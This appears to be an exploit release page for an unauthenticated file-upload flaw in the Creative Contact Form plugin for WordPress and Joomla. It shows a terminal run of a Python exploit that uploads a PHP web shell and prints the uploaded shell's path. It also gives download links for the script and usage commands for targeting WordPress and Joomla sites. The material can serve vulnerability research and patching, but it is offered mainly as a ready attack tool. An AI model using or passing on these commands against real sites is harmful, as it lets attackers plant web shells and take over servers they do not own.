WordPress and Joomla Creative Contact Form Unauthenticated Shell Upload Vulnerability

creative contact form

claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress



  ___ ___               __                            __,-,__                                  
 |   Y   .-----.----.--|  .-----.----.-----.-----.   |  ' '__|                                 
 |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|   |     __|                                 
 |. / \  |_____|__| |_____|   __|__| |_____|_____|   |_______|                                 
 |:      |    _______     |__|             __           |_|                                    
 |::.|:. |   |   _   .-----.-----.--------|  .---.-.                                           
 `--- ---'   |___|   |  _  |  _  |        |  |  _  |                                           
             |.  |   |_____|_____|__|__|__|__|___._|                                           
             |:  1   |                                                                         
             |::.. . |                                                                         
             `-------'      
  _______                  __   __                 _______             __              __
 |   _   .----.-----.---.-|  |_|__.--.--.-----.   |   _   .-----.-----|  |_.---.-.----|  |_    
 |.  1___|   _|  -__|  _  |   _|  |  |  |  -__|   |.  1___|  _  |     |   _|  _  |  __|   _|   
 |.  |___|__| |_____|___._|____|__|\___/|_____|   |.  |___|_____|__|__|____|___._|____|____|   
 |:  1   |       _______                          |:  1   |                                    
 |::.. . |      |   _   .-----.----.--------.     |::.. . |                                    
 `-------'      |.  1___|  _  |   _|        |     `-------'                                    
                |.  __) |_____|__| |__|__|__|                                                  
                |:  |                                                                          
                |::.|                                                                          
                `---'                                                                          
                                                                                               

                                                     Cr3ative C0nt4ct Form Sh3ll Upl04d

                                     Discovered by:
                                     
                                    Gianni Angelozzi

                                      Written by:

                                    Claudio Viviani

                                 http://www.homelab.it

                                    info@homelab.it
                                homelabit@protonmail.ch

                            https://www.facebook.com/homelabit
                              https://twitter.com/homelabit
                            https://plus.google.com/+HomelabIt1/
                   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[!] Shell Uploaded
[!] http://127.0.0.1/wordpress/wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php

Info

# Exploit Name: WordPress and Joomla Creative Contact Form Shell Upload Vulnerability
#               WordPress plugin version: <= 0.9.7
#               Joomla extension version: <= 2.0.0

Download

Download:
    wp_j00m_creative_contact_form_shell_upload.py
    wp_j00m_creative_contact_form_shell_upload.py (Mega Mirror)

Exploit Usage

WordPress:
    claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT] -f shell.php -c wordpress
  or
    claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT]/basedir -f shell.php -c wordpress

Joomla:
   claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT] -f shell.php -c joomla
  or
   claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http[s]://localhost[:PORT]/basedir -f shell.php -c joomla